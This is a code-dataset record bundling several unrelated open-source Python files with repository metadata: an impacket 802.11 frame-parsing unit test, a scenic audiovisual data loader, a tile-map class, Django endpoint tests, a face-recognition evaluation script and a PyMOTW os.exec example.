6da655ca9ac4f9c2a207ea47e79d089044accd78
|
[
"Apache-1.1"
] | 23
|
2020-02-21T02:44:21.000Z
|
2022-03-03T23:40:32.000Z
|
tests/dot11/test_FrameManagementDisassociation.py
|
cipher9rat/impacket
|
142cacb649b8c6441df9330ac22fe4d15a0d1bbc
|
[
"Apache-1.1"
] | null | null | null |
tests/dot11/test_FrameManagementDisassociation.py
|
cipher9rat/impacket
|
142cacb649b8c6441df9330ac22fe4d15a0d1bbc
|
[
"Apache-1.1"
] | 21
|
2021-06-29T23:14:54.000Z
|
2022-03-24T13:13:58.000Z
|
#!/usr/bin/env python
# sorry, this is very ugly, but I'm in python 2.5
import sys
sys.path.insert(0,"../..")
from impacket.dot11 import Dot11Types
from impacket.ImpactDecoder import RadioTapDecoder
import unittest
from six import PY2
class TestDot11ManagementDisassociationFrames(unittest.TestCase):
def setUp(self):
# 802.11 Management Frame
#
self.rawframe=b"\x00\x00\x1c\x00\xef\x18\x00\x00\xe7\x8a\xec\xb8\x3b\x00\x00\x00\x10\x02\x85\x09\xa0\x00\xb5\x9d\x60\x00\x00\x18\xa0\x00\x3a\x01\x00\x18\xf8\x6c\x76\x42\x70\x1a\x04\x54\xe3\x86\x00\x18\xf8\x6c\x76\x42\x70\x92\x08\x00\xbf\x1b\xa3\xa8"
self.radiotap_decoder = RadioTapDecoder()
radiotap=self.radiotap_decoder.decode(self.rawframe)
if PY2:
self.assertEqual(str(radiotap.__class__), "impacket.dot11.RadioTap")
else:
self.assertEqual(str(radiotap.__class__), "<class 'impacket.dot11.RadioTap'>")
self.dot11=radiotap.child()
if PY2:
self.assertEqual(str(self.dot11.__class__), "impacket.dot11.Dot11")
else:
self.assertEqual(str(self.dot11.__class__), "<class 'impacket.dot11.Dot11'>")
type = self.dot11.get_type()
self.assertEqual(type,Dot11Types.DOT11_TYPE_MANAGEMENT)
subtype = self.dot11.get_subtype()
self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION)
typesubtype = self.dot11.get_type_n_subtype()
self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_MANAGEMENT_SUBTYPE_DISASSOCIATION)
self.management_base=self.dot11.child()
if PY2:
self.assertEqual(str(self.management_base.__class__), "impacket.dot11.Dot11ManagementFrame")
else:
self.assertEqual(str(self.management_base.__class__), "<class 'impacket.dot11.Dot11ManagementFrame'>")
self.management_disassociation=self.management_base.child()
if PY2:
self.assertEqual(str(self.management_disassociation.__class__), "impacket.dot11.Dot11ManagementDisassociation")
else:
self.assertEqual(str(self.management_disassociation.__class__), "<class 'impacket.dot11.Dot11ManagementDisassociation'>")
def test_01(self):
'Test Header and Tail Size field'
self.assertEqual(self.management_base.get_header_size(), 22)
self.assertEqual(self.management_base.get_tail_size(), 0)
self.assertEqual(self.management_disassociation.get_header_size(), 2)
self.assertEqual(self.management_disassociation.get_tail_size(), 0)
def test_02(self):
'Test Duration field'
self.assertEqual(self.management_base.get_duration(), 0x013a)
self.management_base.set_duration(0x1234)
self.assertEqual(self.management_base.get_duration(), 0x1234)
def test_03(self):
'Test Destination Address field'
addr=self.management_base.get_destination_address()
self.assertEqual(addr.tolist(), [0x00,0x18,0xF8,0x6C,0x76,0x42])
addr[0]=0x12
addr[5]=0x34
self.management_base.set_destination_address(addr)
self.assertEqual(self.management_base.get_destination_address().tolist(), [0x12,0x18,0xF8,0x6C,0x76,0x34])
def test_04(self):
'Test Source Address field'
addr=self.management_base.get_source_address()
self.assertEqual(addr.tolist(), [0x70,0x1A,0x04,0x54,0xE3,0x86])
addr[0]=0x12
addr[5]=0x34
self.management_base.set_source_address(addr)
self.assertEqual(self.management_base.get_source_address().tolist(), [0x12,0x1A,0x04,0x54,0xE3,0x34])
def test_05(self):
'Test BSSID Address field'
addr=self.management_base.get_bssid()
self.assertEqual(addr.tolist(), [0x00,0x18,0xF8,0x6C,0x76,0x42])
addr[0]=0x12
addr[5]=0x34
self.management_base.set_bssid(addr)
self.assertEqual(self.management_base.get_bssid().tolist(), [0x12,0x18,0xF8,0x6C,0x76,0x34])
def test_06(self):
'Test Sequence control field'
self.assertEqual(self.management_base.get_sequence_control(), 0x9270)
self.management_base.set_sequence_control(0x1234)
self.assertEqual(self.management_base.get_sequence_control(), 0x1234)
def test_07(self):
'Test Fragment number field'
self.assertEqual(self.management_base.get_fragment_number(), 0x00)
self.management_base.set_fragment_number(0xF1) # Es de 4 bit
self.assertEqual(self.management_base.get_fragment_number(), 0x01)
def test_08(self):
'Test Sequence number field'
self.assertEqual(self.management_base.get_sequence_number(), 2343)
self.management_base.set_sequence_number(0xF234) # Es de 12 bit
self.assertEqual(self.management_base.get_sequence_number(), 0x0234)
def test_09(self):
'Test Management Frame Data field'
frame_body=b"\x08\x00"
self.assertEqual(self.management_base.get_frame_body(), frame_body)
def test_10(self):
'Test Management Reason Code field'
self.assertEqual(self.management_disassociation.get_reason_code(), 0x0008)
self.management_disassociation.set_reason_code(0x8765)
self.assertEqual(self.management_disassociation.get_reason_code(), 0x8765)
suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11ManagementDisassociationFrames)
unittest.main(defaultTest='suite')
| 42.549618
| 257
| 0.690527
|
838fd1a86ffe51d69bfad262ca4dd73cd1660324
| 22,567
|
py
|
Python
|
scenic/projects/mbt/datasets/audiovisual_tfrecord_dataset.py
|
techthiyanes/scenic
|
05585b1189364e29d82413b9d4a50ffa8c246f0c
|
[
"Apache-2.0"
] | null | null | null |
scenic/projects/mbt/datasets/audiovisual_tfrecord_dataset.py
|
techthiyanes/scenic
|
05585b1189364e29d82413b9d4a50ffa8c246f0c
|
[
"Apache-2.0"
] | null | null | null |
scenic/projects/mbt/datasets/audiovisual_tfrecord_dataset.py
|
techthiyanes/scenic
|
05585b1189364e29d82413b9d4a50ffa8c246f0c
|
[
"Apache-2.0"
] | null | null | null |
"""TFRecords data-loader for audiovisual datasets."""
import functools
from typing import Dict, Iterator, List, Optional, Text, Tuple, Union
from absl import logging
from dmvr import modalities as load_modalities
from flax import jax_utils
import jax
import jax.numpy as jnp
import ml_collections
import numpy as np
from scenic.dataset_lib import dataset_utils
from scenic.dataset_lib import datasets
from scenic.dataset_lib import video_ops
from scenic.projects.mbt.datasets.dataset_utils import add_spectrogram
from scenic.projects.vivit.data import video_tfrecord_dataset
import tensorflow as tf
# Aliases for custom types:
Batch = Dict[str, jnp.ndarray]
def maybe_pad_batch(batch, train, batch_size, return_as_dict):
"""Zero pad the batch on the right to the batch_size."""
if not return_as_dict:
return dataset_utils.maybe_pad_batch(batch, train, batch_size)
assert 'batch_mask' not in batch
if 'rgb' in batch['inputs']:
unpadded_mask_shape = batch['inputs']['rgb'].shape[0]
batch_pad = batch_size - unpadded_mask_shape
elif 'spectrogram' in batch['inputs']:
unpadded_mask_shape = batch['inputs']['spectrogram'].shape[0]
batch_pad = batch_size - unpadded_mask_shape
else:
raise ValueError('invalid input batch')
if train and batch_pad != 0:
raise ValueError('In this codebase, we assumed that we always drop the '
'last partial batch of the train set. Please use '
'` drop_remainder=True` for the training set.')
# Most batches will not need padding so we quickly return to avoid slowdown.
if train or batch_pad == 0:
if 'batch_mask' not in batch:
batch['batch_mask'] = np.ones(unpadded_mask_shape, dtype=np.float32)
return batch
def zero_pad(array):
pad_with = [(0, batch_pad)] + [(0, 0)] * (array.ndim - 1)
return np.pad(array, pad_with, mode='constant')
padded_batch = jax.tree_map(zero_pad, batch)
padded_batch_mask = zero_pad(np.ones(unpadded_mask_shape, dtype=np.float32))
padded_batch['batch_mask'] = padded_batch_mask
return padded_batch
class AVTFRecordDatasetFactory(video_tfrecord_dataset.TFRecordDatasetFactory):
"""Reader for TFRecords using the MediaSequence format.
The TFrecords already contain images and spectrograms. Spectrograms are
extracted per second and stored with size 128x100 for each second of audio.
"""
_MODALITIES = ('rgb', 'spectrogram')
def __init__(self,
base_dir: str,
tables: Dict[str, Union[str, List[str]]],
num_classes: int,
examples_per_subset: Dict[str, int],
subset: str = 'train',
modalities: Tuple[str] = ('rgb',),
prop_data: float = 1.0,
num_groups: Optional[int] = None,
group_index: Optional[int] = None):
"""Initializes the instance of TFRecordDatasetFactory.
Initializes a data-loader using DeepMind Video Reader (DMVR) pre-processing
(https://github.com/deepmind/dmvr).
TFRecords are assumed to consist of tf.SequenceExample protocol buffers in
the MediaSequence
(https://github.com/google/mediapipe/tree/master/mediapipe/util/sequence)
format.
Args:
base_dir: The base directory of the TFRecords.
tables: A dictionary mapping the subset name (train, val or test) to the
relative path of the SSTable containing them. Follows DMVR convention.
The values of the dictionary can either be a string or a list. If it is
a string, it specifies all the shards in the SSTable. Example -
"/path/to/sstable@10". If passing a list, each entry is a shard of the
SSTable. Example - "[/path/to/sstable_shard_1_of_10, ...,
/path/to/sstabble_shard_10_of_10]." The latter scenario is useful for
debugging.
num_classes: The number of classes in the dataset.
examples_per_subset: A dictionary mapping the subset name (train, val or
test) to the number of examples in the dataset for that subset.
subset: The subset of the dataset to load. Must be a key of "tables"
modalities: Which modality to load. Currently supports 'rgb' and
'spectrogram'
prop_data: The proportion of the data to load. If less than 1.0, this
proportion of the total TFRecord shards are read.
num_groups: If specified will reshard the data according to `num_groups`.
A `group_index` should be specified if using `num_groups`.
group_index: Index of the shard to return after resharding. `num_groups`
should be specified if using `group_index`. This is useful in
distributed setting where one wants to ensure that different data is
read by different workers.
"""
for modality in modalities:
if modality not in AVTFRecordDatasetFactory._MODALITIES:
raise ValueError('Invalid modality %s.' % modality)
self._modalities = modalities
super().__init__(
base_dir=base_dir,
tables=tables,
examples_per_subset=examples_per_subset,
subset=subset,
num_classes=num_classes,
fraction_data=prop_data,
num_groups=num_groups,
group_index=group_index)
def _build(
self,
is_training: bool = True,
# Video related parameters.
num_frames: int = 32,
stride: int = 1,
num_spec_frames: int = 5,
spec_stride: int = 1,
dataset_spec_mean: float = 0.,
dataset_spec_stddev: float = 1.,
num_test_clips: int = 1,
min_resize: int = 256,
crop_size: int = 224,
# Audio related parameters.
spec_shape: Tuple[int, int] = (100, 128),
spec_augment: bool = False,
spec_augment_params=None,
zero_centering_image: bool = False,
# Label related parameters.
one_hot_label: bool = True,
get_label_str: bool = False):
"""Adds DMVR pre-processors to the dataset.
Args:
is_training: whether or not in training mode.
num_frames: number of frames per subclip.
stride: temporal stride to sample frames.
num_spec_frames: number of spectrogram frames.
spec_stride: stride to sample spectrogram.
dataset_spec_mean: Mean of spectrograms in the dataset.
dataset_spec_stddev: Std dev of spectrograms in the dataset.
num_test_clips: number of test clip (1 by default). If more than one, this
will sample multiple linearly spaced clips within each video at test
time. If 1, then a single clip in the middle of the video is sampled.
min_resize: frames are resized so that min width/height is min_resize.
crop_size: final size of the frame after cropping the resized frames.
spec_shape: input size of spectrogram per frame.
spec_augment: whether to apply augmentation using SpecAugment.
spec_augment_params: parameters for SpecAugment.
zero_centering_image: whether to have images between [-1, 1] or [0, 1].
one_hot_label: whether or not to return one hot version of labels.
get_label_str: whether or not to return label as text.
"""
# We set sync_random_state to True so that sample_offset_proportion is
# the same for all modalities.
if 'rgb' in self._modalities:
load_modalities.add_image(
parser_builder=self.parser_builder,
sampler_builder=self.sampler_builder,
decoder_builder=self.decoder_builder,
preprocessor_builder=self.preprocessor_builder,
postprocessor_builder=self.postprocessor_builder,
is_training=is_training,
num_frames=num_frames,
stride=stride,
num_test_clips=num_test_clips,
min_resize=min_resize,
crop_size=crop_size,
zero_centering_image=zero_centering_image,
sync_random_state=True)
if 'spectrogram' in self._modalities:
add_spectrogram(
parser_builder=self.parser_builder,
sampler_builder=self.sampler_builder,
decoder_builder=self.decoder_builder,
preprocessor_builder=self.preprocessor_builder,
postprocessor_builder=self.postprocessor_builder,
input_shape=spec_shape,
is_training=is_training,
num_frames=num_spec_frames,
stride=spec_stride,
num_test_clips=num_test_clips,
spec_augment=spec_augment,
spec_augment_params=spec_augment_params,
zero_centering_image=zero_centering_image,
dataset_mean=dataset_spec_mean,
dataset_stddev=dataset_spec_stddev,
sync_random_state=True)
load_modalities.add_label(
parser_builder=self.parser_builder,
decoder_builder=self.decoder_builder,
preprocessor_builder=self.preprocessor_builder,
is_multi_label=False,
one_hot_label=True,
num_classes=self.num_classes,
add_label_name=False)
def load_split_from_dmvr(ds_factory,
batch_size,
subset='train',
modalities=('rgb'),
num_frames=32,
stride=2,
num_spec_frames=5,
spec_stride=1,
num_test_clips=1,
min_resize=256,
crop_size=224,
spec_shape=(100, 128),
dataset_spec_mean=0.,
dataset_spec_stddev=1.,
spec_augment=False,
spec_augment_params=None,
one_hot_label=True,
zero_centering=True,
get_label_str=False,
augmentation_params=None,
keep_key=False):
"""Loads dataset using DMVR for pre-processing.
DMVR dataset loader already does basic augmentation (random crop and flip in
train mode. It also already shuffles and batches the data.
Args:
ds_factory: A DMVR factory to instantiate with the subset.
batch_size: The batch_size to use.
subset: train, validation or test.
modalities: list of input modalities.
num_frames: Number of RGB frames per subclip.
stride: Temporal stride to sample RGB frames.
num_spec_frames: Number of spectrogram frames per subclip.
spec_stride: Temporal stride to sample spectrogram.
num_test_clips: Number of test clips (1 by default). If more than 1, this
will sample multiple linearly spaced clips within each video at test time.
If 1, then a single clip in the middle of the video is sampled. The clips
are aggreagated in the batch dimension.
min_resize: Frames are resized so that min(height, width) is min_resize.
crop_size: Final size of the frame after cropping the resized frames. Both
height and width are the same.
spec_shape: Input size of spectrogram per frame.
dataset_spec_mean: Mean of spectrograms in the dataset.
dataset_spec_stddev: Std dev of spectrograms in the dataset.
spec_augment: whether to apply augmentation using SpecAugment.
spec_augment_params: dict; augmentation configurations for SpecAugment
one_hot_label: If True, return one-hot version of the labels (ie [N, C])
array. Otherwise, return [N]-dimensional array of labels.
zero_centering: If True, frames are normalized to values in [-1, 1]. If
False, values in [0, 1].
get_label_str: whether or not to return label as text. This does not work on
TPU!.
augmentation_params: dict; augmentation configurations in train mode.
keep_key: bool; If true, also return the key for each example.
Returns:
A pair `(ds, num_examples)` with
ds: A `tf.data.Dataset` object
num_examples: Number of examples in the dataset.
"""
is_training = (subset == 'train')
ds_factory = ds_factory(
subset=subset, modalities=modalities).configure(
is_training=is_training,
num_frames=num_frames,
stride=stride,
num_spec_frames=num_spec_frames,
spec_stride=spec_stride,
num_test_clips=num_test_clips,
min_resize=min_resize,
crop_size=crop_size,
spec_shape=spec_shape,
dataset_spec_mean=dataset_spec_mean,
dataset_spec_stddev=dataset_spec_stddev,
spec_augment=spec_augment,
spec_augment_params=spec_augment_params,
zero_centering_image=zero_centering,
one_hot_label=one_hot_label,
get_label_str=get_label_str)
if 'rgb' in modalities and is_training and augmentation_params:
# additional augmentation for the RGB features.
ds_factory = video_ops.additional_augmentations(ds_factory,
augmentation_params,
crop_size, num_frames,
zero_centering)
logging.info('Preprocessing graph: %s',
ds_factory.preprocessor_builder.get_summary())
logging.info('Postprocessing graph: %s',
ds_factory.postprocessor_builder.get_summary())
num_examples = ds_factory.num_examples
ds = ds_factory.make_dataset(
batch_size=batch_size,
shuffle=is_training,
num_epochs=None if is_training else 1,
drop_remainder=is_training,
keep_key=(not is_training and keep_key))
if not is_training:
ds = ds.repeat(None)
options = tf.data.Options()
options.experimental_threading.private_threadpool_size = 48
ds = ds.with_options(options)
return ds, num_examples
def map_keys(batch, modalities=('rgb'), return_as_dict=False):
"""DMVR dataset returns 'image' and 'label'. We want 'inputs' and 'label'."""
if not return_as_dict:
if len(modalities) == 1 and modalities[0] == 'rgb':
batch['inputs'] = batch['image']
elif len(modalities) == 1 and modalities[0] == 'spectrogram':
batch['inputs'] = batch['spectrogram']
else:
raise NotImplementedError('modality not supported by map_keys.')
else:
batch['inputs'] = {}
if 'rgb' in modalities:
batch['inputs']['rgb'] = batch['image']
if 'spectrogram' in modalities:
batch['inputs']['spectrogram'] = batch['spectrogram']
return batch
def tile_label_key(batch, return_as_dict=False):
"""Tile labels and keys to match input videos when num_test_clips > 1.
When multiple test crops are used (ie num_test_clips > 1), the batch dimension
of batch['inputs'] = test_batch_size * num_test_clips.
However, labels and keys remain of size [test_batch_size].
This function repeats label and key to match the inputs.
Args:
batch: Batch from iterator
return_as_dict: Whether to return multimodal inputs as a dictionary.
Returns:
batch: Batch with 'label' and 'key' tiled to match 'inputs'.
"""
if not return_as_dict:
n_repeats = batch['inputs'].shape[0] // batch['label'].shape[0]
elif 'rgb' in batch['inputs']:
n_repeats = batch['inputs']['rgb'].shape[0] // batch['label'].shape[0]
elif 'spectrogram' in batch['inputs']:
n_repeats = (
batch['inputs']['spectrogram'].shape[0] // batch['label'].shape[0])
batch['label'] = np.repeat(batch['label'], n_repeats, axis=0)
if 'key' in batch:
batch['key'] = np.repeat(batch['key'], n_repeats, axis=0)
return batch
@datasets.add_dataset('audiovisual_tfrecord_dataset')
def get_dataset(
*,
batch_size,
eval_batch_size,
num_shards,
dtype_str='float32',
shuffle_seed=0, # pylint:disable=unused-argument
rng=None,
dataset_configs: ml_collections.ConfigDict,
dataset_service_address: Optional[str] = None):
"""Returns a generator for the audiovisual dataset."""
del rng
modalities = dataset_configs.get('modalities', ['rgb'])
return_as_dict = dataset_configs.get('return_as_dict', False)
# RGB related configs.
num_frames = dataset_configs.get('num_frames', 32)
stride = dataset_configs.get('stride', 2)
min_resize = dataset_configs.get('min_resize', 256)
crop_size = dataset_configs.get('crop_size', 224)
# Spectrogram related configs.
num_spec_frames = dataset_configs.get('num_spec_frames', 5)
spec_stride = dataset_configs.get('spec_stride', 1)
spec_shape = dataset_configs.get('spec_shape', (100, 128))
spec_augment = dataset_configs.get('spec_augment', False)
spec_augment_params = dataset_configs.get('spec_augment_params', None)
dataset_spec_mean = dataset_configs.get('spec_mean', 0.)
dataset_spec_stddev = dataset_configs.get('spec_stddev', 1.)
# General configs.
num_test_clips = dataset_configs.get('num_test_clips', 1)
one_hot_label = dataset_configs.get('one_hot_label', True)
zero_centre_data = dataset_configs.get('zero_centering', True)
augmentation_params = dataset_configs.get('augmentation_params', None)
num_train_val_clips = dataset_configs.get('num_train_val_clips', 1)
do_three_spatial_crops = dataset_configs.get('do_three_spatial_crops', False)
num_spatial_crops = 3 if do_three_spatial_crops else 1
keep_test_key = dataset_configs.get('keep_test_key', False)
test_split = dataset_configs.get('test_split', 'test')
# For the test set, the actual batch size is
# test_batch_size * num_test_clips
test_batch_size = dataset_configs.get('test_batch_size', eval_batch_size)
def validate_config(field):
if dataset_configs.get(field) is None:
raise ValueError(f'{field} must be specified for TFRecord dataset.')
validate_config('base_dir')
validate_config('tables')
validate_config('examples_per_subset')
validate_config('num_classes')
ds_factory = functools.partial(
AVTFRecordDatasetFactory,
base_dir=dataset_configs.base_dir,
tables=dataset_configs.tables,
examples_per_subset=dataset_configs.examples_per_subset,
num_classes=dataset_configs.num_classes,
num_groups=jax.process_count(),
group_index=jax.process_index())
def create_dataset_iterator(
subset: Text,
batch_size_local: int,
num_clips: int,
keep_key_local: bool = False) -> Tuple[Iterator[Batch], int]:
is_training = subset == 'train'
is_test = subset == 'test'
logging.info('Loading split %s', subset)
dataset, num_examples = load_split_from_dmvr(
ds_factory,
batch_size=batch_size_local,
subset=subset,
modalities=modalities,
num_frames=num_frames,
stride=stride,
num_spec_frames=num_spec_frames,
spec_stride=spec_stride,
num_test_clips=num_clips,
min_resize=min_resize,
crop_size=crop_size,
spec_shape=spec_shape,
dataset_spec_mean=dataset_spec_mean,
dataset_spec_stddev=dataset_spec_stddev,
spec_augment=spec_augment,
spec_augment_params=spec_augment_params,
one_hot_label=one_hot_label,
zero_centering=zero_centre_data,
augmentation_params=augmentation_params,
keep_key=keep_key_local)
if dataset_service_address and is_training:
if shuffle_seed is not None:
raise ValueError('Using dataset service with a random seed causes each '
'worker to produce exactly the same data. Add '
'config.shuffle_seed = None to your config if you '
'want to run with dataset service.')
logging.info('Using the tf.data service at %s', dataset_service_address)
dataset = dataset_utils.distribute(dataset, dataset_service_address)
pad_batch_size = batch_size_local
if is_test:
pad_batch_size = batch_size_local * num_clips * num_spatial_crops
maybe_pad_batches = functools.partial(
maybe_pad_batch,
train=is_training,
batch_size=pad_batch_size,
return_as_dict=return_as_dict)
shard_batches = functools.partial(dataset_utils.shard, n_devices=num_shards)
current_iter = iter(dataset)
current_iter = map(dataset_utils.tf_to_numpy, current_iter)
current_iter = map(
functools.partial(
map_keys, modalities=modalities, return_as_dict=return_as_dict),
current_iter)
current_iter = map(
functools.partial(
tile_label_key, return_as_dict=return_as_dict),
current_iter)
current_iter = map(maybe_pad_batches, current_iter)
if augmentation_params and augmentation_params.get('do_mixup', False):
raise ValueError('mixup should be done in the trainer.')
current_iter = map(shard_batches, current_iter)
if is_training and dataset_configs.get('prefetch_to_device'):
# Async bind batch to device which speeds up training.
current_iter = jax_utils.prefetch_to_device(
current_iter, dataset_configs.get('prefetch_to_device'))
return current_iter, num_examples
train_iter, n_train_examples = create_dataset_iterator(
'train', batch_size, num_train_val_clips)
eval_iter, n_eval_examples = create_dataset_iterator('validation',
eval_batch_size,
num_train_val_clips)
test_iter, n_test_examples = create_dataset_iterator(test_split,
test_batch_size,
num_test_clips,
keep_test_key)
meta_data = {
'num_classes': dataset_configs.num_classes, # pylint:disable=protected-access
'num_train_examples': (n_train_examples * num_train_val_clips),
'num_eval_examples': (n_eval_examples * num_train_val_clips),
'num_test_examples':
(n_test_examples * num_test_clips * num_spatial_crops),
'input_dtype': getattr(jnp, dtype_str),
'target_is_onehot': True,
}
if return_as_dict:
meta_data['input_shape'] = {
'rgb': (-1, num_frames, crop_size, crop_size, 3),
'spectrogram': (-1, num_spec_frames * spec_shape[0], spec_shape[1], 3)
}
elif len(modalities) == 1 and modalities[0] == 'rgb':
meta_data['input_shape'] = (-1, num_frames, crop_size, crop_size, 3)
elif len(modalities) == 1 and modalities[0] == 'spectrogram':
meta_data['input_shape'] = (-1, num_spec_frames * spec_shape[0],
spec_shape[1], 3)
else:
raise NotImplementedError('modality not supported')
logging.info('Dataset metadata:\n%s', meta_data)
return dataset_utils.Dataset(train_iter, eval_iter, test_iter, meta_data)
| 41.559853
| 84
| 0.679488
|
613ff0d284b7b4fd287b982c6c03d0da800fb217
| 1,671
|
py
|
Python
|
server/model/tilemap.py
|
jpsachse/megajules3000
|
26ae071cf6456e96d042eaa2239cbaa65113f903
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
server/model/tilemap.py
|
jpsachse/megajules3000
|
26ae071cf6456e96d042eaa2239cbaa65113f903
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
server/model/tilemap.py
|
jpsachse/megajules3000
|
26ae071cf6456e96d042eaa2239cbaa65113f903
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
from tile import Tile, SIZE as tile_size
from PIL import Image
class TileMap():
def __init__(self, width, height, name="No Name", startX = -1, startY = -1, entity="Jules_Verne"):
self.name = name
self.entity = entity
self.matrix = list()
self.actions = list()
self.generate_matrix(width, height)
self.startX = startX
self.startY = startY
def generate_matrix(self, width, height):
self.width = width
self.height = height
for h in range(0, height):
self.matrix.append([Tile() for w in range(0, width)])
def as_image(self, root_directory):
complete_image = Image.new("RGBA",
(tile_size * self.width,
tile_size * self.height))
for w in range(0, self.width):
for h in range(0, self.height):
current_tile = self.matrix[h][w]
current_tile_im = Image.open(root_directory + current_tile.image)
box = (w * tile_size, h * tile_size)
complete_image.paste(current_tile_im, box)
return complete_image
def as_collision_map(self):
complete_collision_map = list()
for w in range(0, self.width):
complete_collision_map.append([])
for h in range(0, self.height):
current_tile = self.matrix[h][w]
current_collision = {
"c": current_tile.collision,
"a": current_tile.action_index
}
complete_collision_map[w].append(current_collision)
return complete_collision_map
| 37.977273
| 102
| 0.564333
|
89d141018b6eba227a583b418bdcc23a95a2495e
| 1,853
|
py
|
Python
|
tests_old/test_api/test_view/test_modelAliases.py
|
appukuttan-shailesh/hbp-validation-framework
|
852cf57ad664aa6d7ba8f2551153b62a342e7727
|
[
"Apache-2.0"
] | 5
|
2020-11-25T08:26:20.000Z
|
2022-02-04T18:56:34.000Z
|
tests_old/test_api/test_view/test_modelAliases.py
|
HumanBrainProject/hbp-validation-framework
|
975c5311539ec0b8ac1db1be1a1006e6f847fa78
|
[
"Apache-2.0"
] | 146
|
2018-03-23T10:09:55.000Z
|
2022-01-03T10:51:00.000Z
|
tests_old/test_api/test_view/test_modelAliases.py
|
appukuttan-shailesh/hbp-validation-framework
|
852cf57ad664aa6d7ba8f2551153b62a342e7727
|
[
"Apache-2.0"
] | 8
|
2018-03-20T14:07:05.000Z
|
2020-07-23T10:11:42.000Z
|
"""
Tests of the ValidationFramework TestsView.
"""
from test_base import *
class ModelAliasesTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.data = DataForTests()
def setUp(self):
#Setup run before every test method.
pass
def test_get_no_param (self):
response = client_authorized.get('/model-aliases/', data={})
# is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 400)
# self.assertEqual(is_valid, True)
def test_get_param_alias_true (self):
response = client_authorized.get('/model-aliases/', data={'alias': self.data.model1.alias+"thing"})
is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 200)
self.assertEqual(is_valid, True)
def test_get_param_alias_false (self):
response = client_authorized.get('/model-aliases/', data={'alias': self.data.model1.alias})
is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 200)
self.assertEqual(is_valid, False)
def test_get_param_model_id (self):
response = client_authorized.get('/model-aliases/', data={'model_id': self.data.model1.id})
# is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 400)
# self.assertEqual(is_valid, True)
def test_get_param_alias_model_id (self):
response = client_authorized.get('/model-aliases/', data={'alias': self.data.model1.alias, 'model_id':self.data.model1.id})
is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 200)
self.assertEqual(is_valid, True)
| 33.690909
| 131
| 0.658931
|
2c324cda23adbb7ee62688675fbc0114ab9575b2
| 1,754
|
py
|
Python
|
src/MS-C2/c2_evaluation/c2ev/testbase/aaa.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 300
|
2019-01-28T07:37:53.000Z
|
2022-03-09T02:17:28.000Z
|
src/MS-C2/c2_evaluation/c2ev/testbase/aaa.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 15
|
2019-04-22T14:23:01.000Z
|
2021-11-24T09:52:32.000Z
|
src/MS-C2/c2_evaluation/c2ev/testbase/aaa.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 67
|
2019-01-29T05:42:09.000Z
|
2021-12-28T11:09:44.000Z
|
import scipy.io as sio
import numpy as np
import matplotlib.pyplot as plt
gndTruth = list(sio.loadmat('noveltest.mat')['label'])
lblist = list(sio.loadmat('base1.mat')['label'])
predresult = []
prednum = np.array(sio.loadmat('novel1testresrdcp2.mat')['data'])[0]
scr = np.array(sio.loadmat('novel1testresrdcp2.mat')['scr'])[0]
for i in range(len(prednum)):
predresult.append(lblist[prednum[i]])
TF = []
sc = []
wrongnum = 0
negative1 = 0
negative2 = 0
fout = open('wrong.txt','w')
for i in range(len(prednum)):
# print(predresult[i],gndTruth[i])
# input()
if predresult[i]==gndTruth[i]:
if scr[i]<0:
negative1+=1
TF.append(1)
else:
TF.append(0)
if scr[i]<0:
negative2+=1
fout.write(gndTruth[i]+'\t'+predresult[i]+'\t'+str(scr[i])+'\n')
wrongnum+=1
sc.append(scr[i])
fout.close()
print('Negative right:',negative1)
print('Negative wrong:',negative2)
print('Wrong:',wrongnum)
TF = np.float32(TF)
avg = np.mean(TF)
print('Accuracy:',avg)
total = list(zip(TF,sc))
# total = sorted(total,key=lambda x: x[0],reverse=True)
srt = sorted(total,key=lambda x: x[1],reverse=True)
print('Last score',srt[-1][1])
print('First score',srt[0][1])
laa = []
truenumber = 0
sss = 0
thre = 0
for i in range(len(prednum)):
truenumber += srt[i][0]
laa.append(float(truenumber)/(i+1))
for i in range(len(prednum)-1):
if laa[i]>0.99 and laa[i+1]<0.99:
print('99pos:',i)
sss = float(i)/len(prednum)
thre = srt[i][1]
print(len(prednum))
print('Acc:',truenumber/len(prednum))
print('Cov@P=0.99:',sss)
print('Threshold:',thre)
plt.ion()
plt.plot(np.array(list(range(len(laa))))/float(len(laa)),laa)
plt.ylim(0.99,1)
plt.xlim(0.9,1)
plt.show()
plt.grid(True)
input()
| 23.702703
| 69
| 0.63512
|
d3734d0ff090072286066e28a24700088c620859
| 184
|
py
|
Python
|
PyMOTW/source/os/os_exec_example.py
|
axetang/AxePython
|
3b517fa3123ce2e939680ad1ae14f7e602d446a6
|
[
"Apache-2.0"
] | 1
|
2019-01-04T05:47:50.000Z
|
2019-01-04T05:47:50.000Z
|
PyMOTW/source/os/os_exec_example.py
|
axetang/AxePython
|
3b517fa3123ce2e939680ad1ae14f7e602d446a6
|
[
"Apache-2.0"
] | 1
|
2020-07-18T03:52:03.000Z
|
2020-07-18T04:18:01.000Z
|
PyMOTW/source/os/os_exec_example.py
|
axetang/AxePython
|
3b517fa3123ce2e939680ad1ae14f7e602d446a6
|
[
"Apache-2.0"
] | 2
|
2021-03-06T04:28:32.000Z
|
2021-03-06T04:59:17.000Z
|
#!/usr/bin/env python3
"""Using os.exec*().
"""
#end_pymotw_header
import os
child_pid = os.fork()
if child_pid:
os.waitpid(child_pid, 0)
else:
os.execlp('pwd', 'pwd', '-P')
| 14.153846
| 33
| 0.630435
|
ed072b01a86a33d6ff8c32739da6539343044321
| 17,303
|
py
|
Python
|
